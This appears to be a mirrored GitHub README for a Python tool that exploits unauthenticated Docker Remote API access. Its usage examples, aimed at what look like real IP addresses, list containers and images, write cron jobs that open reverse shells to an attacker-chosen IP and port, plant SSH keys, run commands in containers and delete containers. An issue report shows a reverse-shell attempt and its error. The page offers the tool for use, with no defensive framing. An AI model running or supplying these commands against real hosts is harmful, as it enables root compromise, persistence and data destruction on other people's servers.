GithubHelp home page GithubHelp logo

docker_api_vul's Introduction

docker_api_vul

docker 未授权访问漏洞利用脚本

##安装类库

pip install -r requirements.txt

##查看运行的容器

python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375

##查看所有的容器

python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -a

##查看所有镜像

python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -l

##查看端口映射

python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -L

##写计划任务(centos,redhat等,加-u参数用于ubuntu等)

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -H 反弹ip -P 反弹端口
python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -u -i 镜像名 -H 反弹ip -P 反弹端口

##写sshkey(自行修改脚本的中公钥)

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -k

##在容器中执行命令

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -e "id" -I 容器id

##删除容器

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -c -I 容器id

##修改client api版本

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -v 1.22

##查看服务端api版本

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -V

docker_api_vul's People

Contributors

tycx2ry avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar

Forkers

dik1s songofhack angelwhu qiuyazhong sigma-random yd0str coffeehb pekita1 lengyun123456 aa2288207 vf3ng v1cker jijicanyu antime 5up3rc gongchengcheng raul1718 qsdj rainism asura-one imjdl kxjhcs mathilda12 kenanat sry309 wsfengfan ianxtianxt ykankaya javalangclass sslvtao 5wimming heyseafh freefv traxsw asiaforest codingsheep4848 jeromeyoung xiju2003 gamblingmaster2020 ch4o3 kil3rr fanyibo2009 hij139 beike2020 unt7 hdys0vn chgsyh zzy64

docker_api_vul's Issues

镜像用的docker.io/alpine:latest,执行反弹报错

python dockerRemoteApiGetRootShell.py -h 6.6.6.6 -p 2375 -C -u -i docker.io/alpine:latest -H 8.8.8.8 -P 1111

报错:
[-]Container ID:ba164c89d44b630a39c94b1e47cf9303ec450116fed66677ea23ac42272e724b
[-]Warning:None
Traceback (most recent call last):
File "dockerRemoteApiGetRootShell.py", line 146, in
response = cli.start(container=container.get('Id'))
File "/usr/lib/python2.7/site-packages/docker/utils/decorators.py", line 21, in wrapped
return f(self, resource_id, *args, **kwargs)
File "/usr/lib/python2.7/site-packages/docker/api/container.py", line 366, in start
self._raise_for_status(res)
File "/usr/lib/python2.7/site-packages/docker/client.py", line 153, in _raise_for_status
raise errors.NotFound(e, response, explanation=explanation)
docker.errors.NotFound: 404 Client Error: Not Found ("{"message":"oci runtime error: container_linux.go:235: starting container process caused "exec: \"/bin/bash\": stat /bin/bash: no such file or directory"\n"}")

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.